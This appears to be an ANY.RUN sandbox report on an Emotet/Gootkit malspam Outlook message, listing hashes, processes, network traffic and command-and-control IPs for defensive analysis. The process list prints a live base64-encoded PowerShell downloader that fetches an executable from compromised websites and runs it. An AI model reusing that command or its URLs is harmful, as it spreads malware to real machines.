analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

FW Bernardo Jay Ann S Ref Id X761974.msg

Full analysis: https://app.any.run/tasks/6f3d287b-2806-496b-a419-b361292c0168
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 15, 2019, 13:46:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
gootkit
loader
emotet
emotet-doc
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

5C0E3DC35BE70B767911DE234E0C05FC

SHA1:

E8961F1B1B246ED136E2E3241A2214F90F31AF78

SHA256:

A834CB03CDCC7BD7757448701AA5451EEA2A0FA9F4C31E5B8065AE9726DE411D

SSDEEP:

3072:vIO77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q47PfIiOmic9eScu:vV77HUUUUUUUUUUUUUUUUUUUT52VVDXg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 235.exe (PID: 3052)
      • soundser.exe (PID: 4044)
      • 235.exe (PID: 2372)
      • soundser.exe (PID: 2932)
      • soundser.exe (PID: 2396)
      • soundser.exe (PID: 3588)
    • GOTKIT detected

      • powershell.exe (PID: 2196)
      • 235.exe (PID: 2372)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2196)
    • Emotet process was detected

      • soundser.exe (PID: 4044)
      • soundser.exe (PID: 2396)
    • EMOTET was detected

      • soundser.exe (PID: 2932)
      • soundser.exe (PID: 3588)
    • Connects to CnC server

      • soundser.exe (PID: 2932)
      • soundser.exe (PID: 3588)
  • SUSPICIOUS

    • Application launched itself

      • WINWORD.EXE (PID: 3268)
      • 235.exe (PID: 3052)
      • soundser.exe (PID: 4044)
      • soundser.exe (PID: 2396)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2196)
      • 235.exe (PID: 2372)
    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 3268)
      • OUTLOOK.EXE (PID: 2952)
    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2952)
      • powershell.exe (PID: 2196)
    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 2952)
      • soundser.exe (PID: 2932)
    • Starts itself from another location

      • 235.exe (PID: 2372)
    • Connects to server without host name

      • soundser.exe (PID: 2932)
      • soundser.exe (PID: 3588)
    • Reads internet explorer settings

      • OUTLOOK.EXE (PID: 2952)
      • helppane.exe (PID: 3100)
    • Uses RUNDLL32.EXE to load library

      • control.exe (PID: 2340)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3336)
      • WINWORD.EXE (PID: 3268)
      • OUTLOOK.EXE (PID: 2952)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3268)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (41.3)
.oft | Outlook Form Template (24.1)
.doc | Microsoft Word document (18.6)
.doc | Microsoft Word document (old ver.) (11)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
57
Monitored processes
15
Malicious processes
8
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start outlook.exe winword.exe no specs winword.exe no specs #GOOTKIT powershell.exe 235.exe no specs #GOOTKIT 235.exe #EMOTET soundser.exe no specs #EMOTET soundser.exe explorer.exe no specs Sharing Elevated Virtual Factory no specs helppane.exe control.exe no specs rundll32.exe no specs #EMOTET soundser.exe no specs #EMOTET soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
2952"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\FW Bernardo Jay Ann S Ref Id X761974.msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
3268"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CNDI0XYM\Data-963990-1240745.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3336"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2196powershell -enc JAByADQANwAyADMANwA4AD0AJwBNADcANgAwADUANQA2ADIAJwA7ACQAcwA4ADkAOAA0ADQAMQA5ACAAPQAgACcAMgAzADUAJwA7ACQAcwA2ADUAOAA3ADQAMQA2AD0AJwBEADAAOAAyADMAMQAnADsAJAB0ADYAMgA4ADYAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcwA4ADkAOAA0ADQAMQA5ACsAJwAuAGUAeABlACcAOwAkAE8ANgAxADcAMgAxADIANAA9ACcAUQA5ADMAMAA3ADMANgAnADsAJABUADMANAA1ADYAOAA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBlAHQALgB3AEUAYABCAGMATABgAGkAYABFAE4AVAA7ACQAbQA0ADcANAA3ADgANQA2AD0AJwBoAHQAdABwADoALwAvAHIAaQB2AGUAcgBzAG8AZgB0AGIAZAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHYARgBpAGsAYQBRAGoAWQBnAC8AQABoAHQAdABwADoALwAvAGQAYQB5AGkAbwBnAGwAdQB1AG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEQAaABNAG8AeABQAHIAdwBDAC8AQABoAHQAdABwADoALwAvAHQAaABlAHIAYQB0AHQAZwBhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHkAbwBzADQAdQA2AGgAXwBwAHQAOAB3AGQAYgAtADMALwBAAGgAdAB0AHAAOgAvAC8AYgBlAHkAYQB6AGcAYQByAGEAZwBlAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ATgB1AHkAZwBpAE0ARgBvAFIAQwAvAEAAaAB0AHQAcAA6AC8ALwBrAHMAYQBmAGUAdAB5AC4AaQB0AC8AYQB3AHMAdABhAHQAcwAtAGkAYwBvAG4ALwBiAGgAcgBkAGQANQBfADUAMgBoAHEAOAA5AC0AMwA0AC8AJwAuAHMAUABMAGkAdAAoACcAQAAnACkAOwAkAHIANgAwADcAMwAzADkAMgA9ACcAbAAyADQAXwA0AF8AOAAwACcAOwBmAG8AcgBlAGEAYwBoACgAJABJAF8ANQAyADgAMAA2ADIAIABpAG4AIAAkAG0ANAA3ADQANwA4ADUANgApAHsAdAByAHkAewAkAFQAMwA0ADUANgA4AC4AZABvAHcAbgBsAE8AYQBEAEYASQBsAEUAKAAkAEkAXwA1ADIAOAAwADYAMgAsACAAJAB0ADYAMgA4ADYAMQApADsAJABWADcAMwA2ADgAMgAwAD0AJwBOADYANwBfADIAOAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAHQANgAyADgANgAxACkALgBsAEUATgBHAHQAaAAgAC0AZwBlACAAMgA2ADAAOQA0ACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawAnACsAJwBlAC0ASQB0AGUAbQAnACkAIAAkAHQANgAyADgANgAxADsAJABuADQANAAwADUANwAxADMAPQAnAHYAMAAwADQAMwBfADUAMwAnADsAYgByAGUAYQBrADsAJAB3ADIANQBfAF8ANQA0AD0AJwBKADMAMQA2ADkAMgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABkADMAOAA1ADUAMgAxAF8APQAnAEkANQBfADgANgAxADEAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3052"C:\Users\admin\235.exe" C:\Users\admin\235.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Exit code:
0
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
2372--ebe2cb72C:\Users\admin\235.exe
235.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Exit code:
0
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
4044"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
235.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Exit code:
0
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
2932--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Exit code:
0
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
3324"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1868C:\Windows\system32\DllHost.exe /Processid:{72A7994A-3092-4054-B6BE-08FF81AEEFFC}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
4 192
Read events
3 277
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
6
Text files
26
Unknown types
22

Dropped files

PID
Process
Filename
Type
2952OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVRE696.tmp.cvr
MD5:
SHA256:
2952OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DFFA38EEDFE794DA62.TMP
MD5:
SHA256:
2952OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CNDI0XYM\Data-963990-1240745 (2).doc\:Zone.Identifier:$DATA
MD5:
SHA256:
3268WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF9C0.tmp.cvr
MD5:
SHA256:
3268WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_E8638DFC-1D2C-4B3F-B30C-4535D291AB8E.0\65CA99C5.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
2952OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:D3AF71A54A89E4912301515389F36E76
SHA256:DFF85BCBAEC6D8ED8A28C65B01D79126B554E53BBCDAAD767878D9D1DC0ADE71
2952OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_4405C6842A106C4D8714AE8D826672F8.datxml
MD5:EEAA832C12F20DE6AAAA9C7B77626E72
SHA256:C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16
3268WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:063161B1F0E6D654F89E71E9B690A321
SHA256:11BD60BF5572DB7AE4AC66329B6C70495CA47C3F11D1DA966DEFBBE910E7AE2F
2952OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CNDI0XYM\Data-963990-1240745.docdocument
MD5:A9A114729097F9394B8854746CE0BE4A
SHA256:D3256BAAC392675D7F106D18C7B6C605F85208CB93D8A105E9183D6E6BC356B7
3268WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_E8638DFC-1D2C-4B3F-B30C-4535D291AB8E.0\65CA99C5.docdocument
MD5:A9A114729097F9394B8854746CE0BE4A
SHA256:D3256BAAC392675D7F106D18C7B6C605F85208CB93D8A105E9183D6E6BC356B7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
9
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2952
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
2196
powershell.exe
GET
200
99.198.101.186:80
http://riversoftbd.com/wp-content/vFikaQjYg/
US
executable
118 Kb
suspicious
3588
soundser.exe
POST
200.85.46.122:80
http://200.85.46.122/dma/
PY
malicious
2932
soundser.exe
POST
200.85.46.122:80
http://200.85.46.122/odbc/badge/ringin/merge/
PY
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2952
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
94.59.49.76:995
Emirates Telecommunications Corporation
AE
malicious
3588
soundser.exe
200.85.46.122:80
Telecel S.A.
PY
malicious
2196
powershell.exe
99.198.101.186:80
riversoftbd.com
SingleHop, Inc.
US
suspicious
2932
soundser.exe
134.196.53.52:7080
True Internet Co.,Ltd.
TH
malicious
2932
soundser.exe
94.59.49.76:995
Emirates Telecommunications Corporation
AE
malicious
3588
soundser.exe
134.196.53.52:7080
True Internet Co.,Ltd.
TH
malicious
2932
soundser.exe
41.184.246.205:53
IPNXng
NG
malicious
2932
soundser.exe
200.85.46.122:80
Telecel S.A.
PY
malicious

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
riversoftbd.com
  • 99.198.101.186
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
2196
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2196
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2196
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2932
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2932
soundser.exe
Generic Protocol Command Decode
SURICATA STREAM CLOSEWAIT FIN out of window
3588
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
6 ETPRO signatures available at the full report
Process
Message
helppane.exe
C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1QLonghorn HxQ